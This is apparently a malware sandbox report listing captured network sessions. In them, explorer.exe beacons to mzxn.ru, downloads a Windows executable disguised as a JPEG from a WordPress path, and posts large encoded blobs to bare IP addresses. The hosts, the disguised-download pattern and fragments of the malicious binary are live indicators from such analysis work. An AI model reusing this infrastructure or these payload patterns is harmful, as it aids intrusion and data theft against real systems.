Jul 27, 2024 07:32:42.339493990 CEST	277	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sqxnnumhnssm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 349 Host: mzxn.ru
Jul 27, 2024 07:32:42.339519978 CEST	349	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 24 26 dd f6 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vu$&\^FXg{"P~+tcGg_gY5:Z9 6e}~yK?rKFjr=V #`V/~GB-q*i\|!JFKr
Jul 27, 2024 07:32:43.542148113 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:32:43 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	51919	177.222.41.236	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:32:51.113221884 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ctqgxbikusofytgf.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: mzxn.ru
Jul 27, 2024 07:32:51.113245010 CEST	148	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 35 c9 ac Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vu@5{Ts\zCa4VMXS[3'<?U&dhh
Jul 27, 2024 07:32:52.359802961 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:32:52 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	51925	177.222.41.236	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 07:33:00.266566038 CEST	276	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dbybeunkxlc.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 121 Host: mzxn.ru
Jul 27, 2024 07:33:00.266597033 CEST	121	OUT	Data Raw: 3b 6e 22 17 f5 c8 6f 22 d7 de c2 70 0f 08 7c bd 7a 0d cb ed 19 06 93 15 0c 7a 7f 9d 37 b1 b5 63 e9 5f b5 2e 0f 6d 50 6a ec ea 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 20 09 cc b6 Data Ascii: ;n"o"p\|zz7c_.mPj?#1\|J7 M@NA .[k,vu d]xjrtS)d/D7
Jul 27, 2024 07:33:01.524010897 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Sat, 27 Jul 2024 05:33:01 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	51812	185.149.100.242	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:14 UTC	179	OUT	GET /wp-content/images/pic1.jpg HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: mussangroup.com
2024-07-27 05:30:15 UTC	452	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Sat, 03 Aug 2024 05:30:15 GMT content-type: image/jpeg last-modified: Wed, 24 Jul 2024 11:31:45 GMT accept-ranges: bytes content-length: 11672576 date: Sat, 27 Jul 2024 05:30:15 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 24 00 2c 49 00 00 18 b2 00 00 80 09 00 c0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 10 bc 00 00 04 00 00 a4 34 b2 00 02 00 60 81 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd.$,I@4`
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 49 3b 66 10 76 1d 55 48 89 e5 48 83 ec 18 48 8b 10 48 8b 48 08 48 89 d0 e8 a3 60 00 00 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 ee 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 eb c2 cc cc 49 3b 66 10 0f 86 83 00 00 00 55 48 89 e5 48 83 ec 18 f3 0f 10 00 0f 57 c9 0f 2e c1 75 04 66 90 7b 4a 0f 2e c0 75 02 7b 33 48 89 5c 24 30 e8 cd 34 06 00 48 8b 4c 24 30 48 31 c8 48 b9 21 a6 56 6a a1 6e 75 00 48 31 c8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 b9 04 00 00 00 e8 5a 85 06 00 48 83 c4 18 5d c3 48 b8 21 a6 56 6a a1 6e 75 00 48 31 d8 48 b9 bf 63 8f bb 6b ef 52 00 48 0f af c1 48 83 c4 18 5d c3 48 89 44 24 08 48 89 5c 24 10 e8 44 67 06 00 48 8b 44 24 08 48 8b 5c 24 10 e9 55 ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: I;fvUHHHHHH`H]HD$H\$gHD$H\$I;fUHHW.uf{J.u{3H\$04HL$0H1H!VjnuH1HckRHH]ZH]H!VjnuH1HckRHH]HD$H\$DgHD$H\$U
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: e8 1b 2e 03 00 48 8d 05 0e df 65 00 bb 08 00 00 00 e8 8a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 fb 34 03 00 e8 36 30 03 00 e8 51 2e 03 00 48 8b 44 24 30 48 8b 88 d8 00 00 00 48 89 4c 24 18 e8 db 2d 03 00 48 8d 05 d6 de 65 00 bb 08 00 00 00 e8 4a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 bb 34 03 00 e8 f6 2f 03 00 e8 11 2e 03 00 48 8b 44 24 30 48 8b 88 e0 00 00 00 48 89 4c 24 18 e8 9b 2d 03 00 48 8d 05 9e de 65 00 bb 08 00 00 00 e8 0a 36 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b 34 03 00 e8 b6 2f 03 00 e8 d1 2d 03 00 48 8b 44 24 30 48 8b 88 e8 00 00 00 48 89 4c 24 18 e8 5b 2d 03 00 48 8d 05 66 de 65 00 bb 08 00 00 00 e8 ca 35 03 00 48 8b 44 24 18 0f 1f 44 00 00 e8 3b 34 03 00 e8 76 2f 03 00 e8 91 2d 03 00 48 8b 44 24 30 48 8b 88 f0 00 00 00 48 89 4c 24 Data Ascii: .He6HD$D460Q.HD$0HHL$-HeJ6HD$D4/.HD$0HHL$-He6HD$D{4/-HD$0HHL$[-Hfe5HD$D;4v/-HD$0HHL$
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 48 c1 e3 10 48 89 ce 81 e1 ff ff 07 00 48 09 cb 48 89 d9 48 c1 fb 13 48 c1 e3 03 90 90 90 66 90 48 39 da 74 05 eb 23 48 89 f0 48 8b 18 48 89 1a 48 89 c6 48 89 d8 f0 48 0f b1 0e 0f 94 c3 66 90 84 db 74 e3 48 83 c4 30 5d c3 48 89 54 24 28 48 89 74 24 18 48 89 4c 24 10 48 89 5c 24 20 66 90 e8 bb ed 02 00 48 8d 05 4a 2d 67 00 bb 2c 00 00 00 e8 2a f6 02 00 48 8b 44 24 28 0f 1f 44 00 00 e8 9b f5 02 00 48 8d 05 68 87 65 00 bb 05 00 00 00 e8 0a f6 02 00 48 8b 44 24 18 0f 1f 44 00 00 e8 7b f4 02 00 48 8d 05 ce 9e 65 00 bb 08 00 00 00 e8 ea f5 02 00 48 8b 44 24 10 0f 1f 44 00 00 e8 5b f4 02 00 48 8d 05 44 a7 65 00 bb 09 00 00 00 e8 ca f5 02 00 48 8b 44 24 20 0f 1f 44 00 00 e8 3b f5 02 00 e8 76 ef 02 00 e8 91 ed 02 00 48 8d 05 45 ca 65 00 bb 0c 00 00 00 0f 1f 44 00 Data Ascii: HHHHHHfH9t#HHHHHHftH0]HT$(Ht$HL$H\$ fHJ-g,*HD$(DHheHD$D{HeHD$D[HDeHD$ D;vHEeD
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 24 60 0f b7 7e 52 48 0f af cf 48 c1 e8 38 48 03 4b 10 3c 05 73 03 83 c0 05 48 89 4c 24 40 88 44 24 1f 48 89 ca eb 43 8b 50 54 0f ba e2 04 72 06 31 c0 31 db eb 0f 48 8b 40 30 48 89 cb 0f 1f 00 e8 9b 46 ff ff 48 85 c0 75 06 48 83 c4 50 5d c3 74 04 48 8b 40 08 e8 65 87 02 00 0f b7 7e 52 48 8d 3c 0f 48 8d 7f f8 48 8b 0f 48 85 c9 74 09 48 89 4c 24 48 31 ff eb 36 0f b6 4b 08 0f 1f 40 00 f6 c1 04 75 16 48 8d 05 25 fa 65 00 bb 15 00 00 00 e8 ca 93 02 00 48 8b 5c 24 68 0f b6 43 08 83 e0 fb 88 43 08 48 83 c4 50 5d c3 48 ff c7 48 83 ff 08 73 a7 44 0f b6 04 0f 44 38 c0 74 09 66 90 45 84 c0 75 e6 eb b1 48 89 7c 24 20 44 0f b6 46 50 4c 0f af c7 49 8d 0c 08 48 8d 49 08 44 8b 46 54 48 89 4c 24 38 41 0f ba e0 00 73 05 4c 8b 01 eb 03 49 89 c8 48 8b 4e 30 48 8b 51 18 48 8b Data Ascii: $`~RHH8HK<sHL$@D$HCPTr11H@0HFHuHP]tH@e~RH<HHHtHL$H16K@uH%eH\$hCCHP]HHsDD8tfEuH\|$ DFPLIHIDFTHL$8AsLIHN0HQH
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 24 68 48 8b 11 48 8d 72 ff 48 89 31 48 83 fa 01 75 0d e8 29 35 05 00 48 8b 4c 24 68 89 41 0c 48 89 cb e9 8d fe ff ff 48 83 fa 08 73 65 41 84 01 41 c6 04 11 00 48 85 d2 75 0a 4d 39 d1 74 be 4c 89 d0 eb 29 48 ff ca 48 83 fa 08 73 10 41 84 01 42 0f b6 34 0a 40 80 fe 01 74 cc eb a0 48 89 d0 b9 08 00 00 00 e8 d6 8a 05 00 49 89 d2 0f b7 57 52 4c 89 d6 4a 8d 14 12 48 8d 52 f8 48 8b 12 90 49 39 d1 75 e5 49 89 c2 ba 07 00 00 00 49 89 f1 eb b5 48 89 d0 b9 08 00 00 00 e8 a1 8a 05 00 90 48 89 44 24 08 48 89 5c 24 10 48 89 4c 24 18 48 89 7c 24 20 e8 67 67 05 00 48 8b 44 24 08 48 8b 5c 24 10 48 8b 4c 24 18 48 8b 7c 24 20 e9 ce fc ff ff cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 76 5f 55 48 89 e5 48 83 ec 18 0f b6 53 08 0f b6 73 09 f6 c2 08 75 02 ff ce 48 89 Data Ascii: $hHHrH1Hu)5HL$hAHHseAAHuM9tL)HHsAB4@tHIWRLJHRHI9uIIHHD$H\$HL$H\|$ ggHD$H\$HL$H\|$ I;fv_UHHSsuH
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 00 f2 0f 10 05 47 55 70 00 f2 0f 11 02 b8 01 00 00 00 eb 2c 48 81 c4 08 02 00 00 5d c3 4c 8b 0d 7c 61 ac 00 41 ff c0 45 0f b7 c0 0f 57 c0 f2 41 0f 2a c0 f2 41 0f 11 04 c1 48 ff c0 0f 1f 40 00 48 83 f8 44 7d 1f 48 8b 0d 5b 61 ac 00 48 8d 15 6c 3d 48 00 44 0f b7 04 42 48 39 c8 72 bf 66 90 e9 4d 17 00 00 48 8b 0d 44 61 ac 00 48 8b 1d 35 61 ac 00 48 ff c3 48 8b 05 23 61 ac 00 0f 1f 00 48 39 d9 73 3b bf 01 00 00 00 48 8d 35 2f 0e 57 00 e8 6a 75 03 00 48 89 0d 13 61 ac 00 83 3d 6c 0e b5 00 00 74 13 e8 d5 46 05 00 49 89 03 48 8b 0d eb 60 ac 00 49 89 4b 08 48 89 05 e0 60 ac 00 48 89 1d e1 60 ac 00 f2 0f 10 05 d1 55 70 00 f2 0f 11 44 d8 f8 e8 66 25 ff ff 48 89 1d e7 60 ac 00 48 89 0d e8 60 ac 00 83 3d 21 0e b5 00 00 74 13 e8 8a 46 05 00 49 89 03 48 8b 15 c0 60 ac Data Ascii: GUp,H]L\|aAEWA*AH@HD}H[aHl=HDBH9rfMHDaH5aHH#aH9s;H5/WjuHa=ltFIH`IKH`H`UpDf%H`H`=!tFIH`
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: 29 d1 ff c1 d1 e1 48 8d 15 77 c9 b4 00 f0 0f b1 0a 0f 94 c1 84 c9 74 c7 90 8b 05 15 37 ac 00 89 c1 81 e1 00 00 00 80 85 c9 75 21 8d 50 01 48 8d 35 ff 36 ac 00 f0 0f b1 16 0f 94 c2 0f 1f 40 00 84 d2 74 d4 8b 15 36 e9 ad 00 eb 06 8b 15 2e e9 ad 00 89 8c 24 a4 00 00 00 89 94 24 a0 00 00 00 0f b6 74 24 26 40 84 f6 74 04 85 c9 eb 14 85 c9 0f 85 f3 08 00 00 40 84 f6 74 0d 0f 1f 44 00 00 85 c9 0f 84 d0 08 00 00 44 0f 11 bc 24 78 01 00 00 c6 84 24 88 01 00 00 00 48 c7 84 24 90 01 00 00 00 00 00 00 48 8d 05 94 09 00 00 48 89 84 24 78 01 00 00 48 8b 84 24 a8 00 00 00 48 89 84 24 80 01 00 00 0f b6 44 24 3f 88 84 24 88 01 00 00 48 8b 84 24 30 01 00 00 48 89 84 24 90 01 00 00 48 8d 84 24 78 01 00 00 48 89 04 24 e8 0f e6 04 00 45 0f 57 ff 4c 8b 35 f4 cb b4 00 65 4d 8b Data Ascii: )Hwt7u!PH56@t6.$$t$&@t@tDD$x$H$HH$xH$H$D$?$H$0H$H$xH$EWL5eM
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: df 48 8d b4 24 a0 00 00 00 bb 08 00 00 00 48 89 d0 e8 ca 0e 00 00 48 8b 84 24 30 01 00 00 48 8d 7c 24 40 48 8d 7f e0 48 89 6c 24 f0 48 8d 6c 24 f0 e8 f5 cd 04 00 48 8b 6d 00 48 c7 c3 ff ff ff ff 48 89 d9 48 89 cf 48 89 c6 45 31 c0 48 8d 44 24 40 e8 49 d2 03 00 e9 d5 00 00 00 0f 1f 40 00 83 fa 06 75 0b 31 c0 48 81 c4 20 01 00 00 5d c3 90 8b 88 90 00 00 00 89 c9 48 89 8c 24 08 01 00 00 48 8b 90 98 00 00 00 48 89 94 24 00 01 00 00 e8 8b ad 01 00 48 8d 05 23 8b 64 00 bb 0c 00 00 00 e8 fa b5 01 00 48 8b 84 24 30 01 00 00 e8 6d b5 01 00 48 8d 05 ce 55 64 00 bb 07 00 00 00 90 e8 db b5 01 00 48 8b 84 24 00 01 00 00 e8 0e b3 01 00 48 8d 05 62 df 64 00 bb 13 00 00 00 66 90 e8 bb b5 01 00 48 8b 84 24 08 01 00 00 e8 ee b2 01 00 e8 69 af 01 00 e8 84 ad 01 00 48 8d 05 Data Ascii: H$HH$0H\|$@HHl$Hl$HmHHHHE1HD$@I@u1H ]H$HH$H#dH$0mHUdH$HbdfH$iH
2024-07-27 05:30:15 UTC	16384	IN	Data Raw: eb be cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 49 3b 66 10 0f 86 84 01 00 00 55 48 89 e5 48 83 ec 20 48 89 44 24 30 84 00 90 e8 21 82 fe ff 4c 89 f1 48 8b 44 24 30 48 39 48 08 0f 85 4b 01 00 00 90 e8 69 84 fe ff 0f 57 c0 31 c0 eb 06 0f 10 c1 48 89 c8 f2 0f 10 0d 2c 96 6f 00 66 0f 2e c8 0f 86 f0 00 00 00 f2 0f 11 44 24 18 48 89 44 24 10 48 8b 44 24 30 48 8b 90 90 00 00 00 48 8b 0a ff d1 84 c0 0f 85 bf 00 00 00 48 8b 4c 24 30 48 8b 91 88 00 00 00 48 8b 1a b8 00 00 01 00 ff d3 48 85 db 75 5e 48 8b 0d c4 49 b4 00 0f 1f 40 00 48 85 c9 0f 84 ce 00 00 00 48 89 c2 48 89 d3 31 d2 48 f7 f1 48 85 c0 7c 0a 0f 57 c9 f2 48 0f 2a c8 eb 18 48 89 c1 83 e0 01 48 d1 e9 48 09 c1 0f 57 c9 f2 48 0f 2a c9 f2 0f 58 c9 f2 0f 10 15 Data Ascii: I;fUHH HD$0!LHD$0H9HKiW1H,of.D$HD$HD$0HHHL$0HHHu^HI@HHH1HH\|WHHHHWHX

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	51813	167.235.128.153	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:19 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 9363
2024-07-27 05:30:19 UTC	9363	OUT	Data Raw: 43 6b 42 46 4e 63 70 31 31 33 59 6b 4d 64 47 5a 65 36 66 5a 37 4a 6f 6f 30 35 5a 36 50 39 70 43 6f 31 63 6c 38 64 4a 74 31 74 36 52 77 44 69 63 4b 39 58 6e 30 33 67 74 50 75 36 42 68 66 63 43 2f 6f 4e 58 57 46 33 33 61 50 7a 2b 6a 66 4b 67 4e 64 49 49 37 39 6d 43 31 56 65 6b 48 78 79 44 7a 43 32 6a 48 68 2f 6e 4e 70 5a 6d 6d 6b 4f 41 43 42 73 6e 6e 58 2f 62 6f 55 37 36 5a 2f 71 76 72 72 4f 77 54 43 46 64 6e 42 46 77 69 73 36 4a 41 66 4d 45 4e 31 32 41 69 6c 4a 6a 4a 48 64 38 34 77 4e 41 56 52 46 70 6e 74 7a 4d 74 74 61 48 36 76 63 48 70 36 53 55 32 49 5a 4a 50 49 37 5a 6f 68 4b 67 48 61 51 43 38 32 37 76 46 38 72 75 62 57 66 6c 51 47 61 76 6a 6a 54 4a 47 50 65 50 56 57 75 2b 62 45 73 33 2b 4c 76 4a 42 52 43 33 65 33 6b 43 37 30 4a 73 6b 34 43 74 7a 32 42 Data Ascii: CkBFNcp113YkMdGZe6fZ7Joo05Z6P9pCo1cl8dJt1t6RwDicK9Xn03gtPu6BhfcC/oNXWF33aPz+jfKgNdII79mC1VekHxyDzC2jHh/nNpZmmkOACBsnnX/boU76Z/qvrrOwTCFdnBFwis6JAfMEN12AilJjJHd84wNAVRFpntzMttaH6vcHp6SU2IZJPI7ZohKgHaQC827vF8rubWflQGavjjTJGPePVWu+bEs3+LvJBRC3e3kC70Jsk4Ctz2B
2024-07-27 05:30:20 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 733 Date: Sat, 27 Jul 2024 05:30:20 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-27 05:30:20 UTC	733	IN	Data Raw: 66 2b 49 78 6b 46 6c 69 38 36 6e 46 48 35 62 43 30 37 6b 38 72 54 2b 42 36 70 6c 30 45 74 68 7a 74 2b 6b 33 44 6a 7a 55 34 33 58 55 74 55 43 71 31 75 31 2b 31 70 58 30 4c 49 30 66 52 6d 41 67 78 5a 33 4b 34 77 50 58 6d 54 66 71 4d 31 61 37 65 47 4e 64 4e 4d 48 47 53 52 4f 65 42 76 74 46 4e 46 7a 74 37 43 78 42 61 61 39 6b 4c 35 49 65 50 55 7a 72 33 41 55 63 43 4e 56 51 50 76 66 76 46 6f 65 6a 50 68 6a 78 76 4a 47 79 43 62 76 61 57 71 64 39 73 4f 4c 7a 75 2f 69 56 71 56 4a 61 51 51 6f 30 45 55 47 75 54 6d 33 49 62 6d 45 37 77 5a 38 48 4d 43 35 68 4d 35 74 35 68 42 53 4b 7a 61 59 43 74 54 52 6a 52 33 66 78 2b 79 49 75 41 39 63 73 2b 73 51 4b 49 6f 6e 64 6f 36 75 4b 4d 63 67 35 33 45 47 54 52 6f 49 57 75 63 5a 77 34 74 45 42 42 44 41 58 64 62 79 6a 73 42 7a Data Ascii: f+IxkFli86nFH5bC07k8rT+B6pl0Ethzt+k3DjzU43XUtUCq1u1+1pX0LI0fRmAgxZ3K4wPXmTfqM1a7eGNdNMHGSROeBvtFNFzt7CxBaa9kL5IePUzr3AUcCNVQPvfvFoejPhjxvJGyCbvaWqd9sOLzu/iVqVJaQQo0EUGuTm3IbmE7wZ8HMC5hM5t5hBSKzaYCtTRjR3fx+yIuA9cs+sQKIondo6uKMcg53EGTRoIWucZw4tEBBDAXdbyjsBz

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	51814	107.173.160.137	443	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-27 05:30:21 UTC	236	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 155843
2024-07-27 05:30:21 UTC	16148	OUT	Data Raw: 58 30 48 4a 7a 38 4c 5a 64 49 47 31 2b 39 73 31 77 44 54 50 67 37 34 74 64 4c 46 43 31 51 75 79 61 58 33 33 6a 6f 59 64 61 5a 48 61 35 48 73 65 58 79 6d 63 38 59 62 66 61 69 61 4c 70 6f 48 33 64 4f 4c 36 4c 74 56 4b 6b 77 38 68 58 35 51 70 7a 51 34 56 69 79 53 48 7a 34 38 71 7a 63 6d 6c 6c 4e 44 42 4f 56 64 54 48 38 35 6e 4f 6d 38 53 65 64 69 79 42 43 35 58 32 66 4b 48 69 2b 2f 34 4f 2f 6e 45 37 37 4a 50 30 63 48 76 56 66 57 49 67 65 48 67 74 6a 38 43 6b 4b 4a 35 6d 46 58 68 55 6e 39 52 35 6d 5a 6c 55 44 52 61 4c 66 5a 78 65 6f 64 55 56 46 73 62 62 6e 4b 71 61 34 33 51 64 41 61 2f 6d 37 46 47 2b 6a 63 4d 35 47 34 6d 52 56 4b 6a 57 7a 2f 51 2b 54 71 53 78 38 68 56 66 30 66 4f 66 56 6b 47 44 2b 43 79 31 62 6b 41 44 4f 50 4f 45 7a 5a 7a 2b 43 52 31 78 79 52 Data Ascii: X0HJz8LZdIG1+9s1wDTPg74tdLFC1QuyaX33joYdaZHa5HseXymc8YbfaiaLpoH3dOL6LtVKkw8hX5QpzQ4ViySHz48qzcmllNDBOVdTH85nOm8SediyBC5X2fKHi+/4O/nE77JP0cHvVfWIgeHgtj8CkKJ5mFXhUn9R5mZlUDRaLfZxeodUVFsbbnKqa43QdAa/m7FG+jcM5G4mRVKjWz/Q+TqSx8hVf0fOfVkGD+Cy1bkADOPOEzZz+CR1xyR
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 67 46 6c 6f 4c 4e 6c 73 62 65 50 74 67 6e 43 62 70 75 4b 72 4a 6b 6e 32 2b 6d 57 68 5a 2b 42 53 32 4a 56 34 36 78 44 68 77 4c 6c 78 65 6c 4a 75 6a 61 31 5a 2f 5a 2f 4f 78 67 58 6d 73 6e 48 34 54 42 77 67 38 57 71 4e 4c 51 41 71 31 75 4e 54 48 62 57 38 47 75 37 52 34 77 68 39 57 4c 72 46 2b 4a 65 49 61 6f 34 4d 37 44 6c 42 66 55 41 46 51 6e 38 6b 6c 56 78 5a 75 72 34 48 77 78 66 51 6e 54 6b 38 7a 41 6f 79 37 61 4d 45 76 4a 36 65 4b 58 32 54 34 43 48 4a 48 6a 55 75 72 61 4c 4b 6d 67 2f 6e 6d 52 72 56 42 72 5a 6b 74 2b 71 69 4d 39 44 6e 75 4a 31 71 42 6c 46 30 45 58 67 78 6f 77 49 31 72 77 50 4f 44 63 65 4e 42 4d 42 41 77 5a 4d 44 46 65 44 56 6a 75 71 59 41 32 74 77 69 4d 61 61 55 4a 79 62 76 53 6c 72 6f 75 46 61 55 4d 65 4a 76 62 42 71 4a 33 4e 41 72 58 6f Data Ascii: gFloLNlsbePtgnCbpuKrJkn2+mWhZ+BS2JV46xDhwLlxelJuja1Z/Z/OxgXmsnH4TBwg8WqNLQAq1uNTHbW8Gu7R4wh9WLrF+JeIao4M7DlBfUAFQn8klVxZur4HwxfQnTk8zAoy7aMEvJ6eKX2T4CHJHjUuraLKmg/nmRrVBrZkt+qiM9DnuJ1qBlF0EXgxowI1rwPODceNBMBAwZMDFeDVjuqYA2twiMaaUJybvSlrouFaUMeJvbBqJ3NArXo
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 33 46 4f 57 57 56 6a 2b 52 39 51 5a 73 48 58 71 61 77 34 61 41 34 4c 41 49 79 58 58 42 45 63 59 31 41 4b 39 41 79 34 79 6c 7a 43 41 6e 6d 68 68 68 52 63 47 37 61 61 4f 30 39 59 4d 55 7a 6a 68 35 31 42 65 6b 6e 51 70 31 33 4e 64 73 47 39 2b 71 78 32 65 7a 66 65 45 4e 2f 31 32 44 44 4f 41 41 49 48 4b 2b 74 6e 62 73 42 36 2f 66 74 63 38 62 38 35 44 58 76 57 4a 7a 43 33 48 37 32 43 4b 65 6b 38 49 6c 78 48 6e 71 6f 69 51 55 4f 4a 2b 76 4f 34 34 2b 4a 67 6b 72 4a 62 71 70 5a 6a 49 62 69 72 42 78 39 72 55 6b 44 74 37 66 2b 71 41 6a 5a 68 79 6f 62 63 72 75 57 36 4f 66 34 61 50 38 58 37 6f 53 33 75 63 70 44 57 35 69 54 64 2f 4c 79 76 56 75 48 4d 64 55 32 75 52 44 76 6b 6e 69 6b 58 6d 76 2b 45 45 68 51 43 35 72 4e 58 4f 74 70 2b 63 36 49 2b 5a 38 56 58 56 76 55 47 Data Ascii: 3FOWWVj+R9QZsHXqaw4aA4LAIyXXBEcY1AK9Ay4ylzCAnmhhhRcG7aaO09YMUzjh51BeknQp13NdsG9+qx2ezfeEN/12DDOAAIHK+tnbsB6/ftc8b85DXvWJzC3H72CKek8IlxHnqoiQUOJ+vO44+JgkrJbqpZjIbirBx9rUkDt7f+qAjZhyobcruW6Of4aP8X7oS3ucpDW5iTd/LyvVuHMdU2uRDvknikXmv+EEhQC5rNXOtp+c6I+Z8VXVvUG
2024-07-27 05:30:21 UTC	16384	OUT	Data Raw: 43 71 45 53 36 44 37 54 57 6b 34 61 65 70 38 44 4e 45 68 4e 2b 69 58 39 57 57 6c 55 39 68 42 4a 79 38 72 53 4e 41 75 68 78 59 5a 76 66 55 4a 6a 39 36 6d 36 57 79 6a 50 6b 38 6a 30 74 32 6b 6b 74 78 50 43 48 7a 4f 68 43 39 77 61 35 50 4b 50 43 78 72 74 4b 74 36 4b 31 33 55 32 79 59 69 72 7a 4a 4e 61 32 51 49 34 36 7a 6f 55 49 70 74 67 79 36 75 64 47 77 34 67 6f 73 72 74 66 75 49 75 69 58 51 31 4e 49 41 55 73 4e 35 56 33 62 4c 33 52 4a 51 34 41 42 55 67 4d 51 4d 63 53 74 52 35 64 43 45 30 58 57 4f 50 33 54 6c 55 56 2b 61 31 38 30 61 70 74 76 74 71 45 2b 63 58 71 6b 67 67 54 33 78 67 72 56 69 31 57 6f 74 78 71 7a 45 2f 55 4d 4b 4d 53 51 45 7a 4b 35 73 39 50 2b 49 32 38 33 72 2f 54 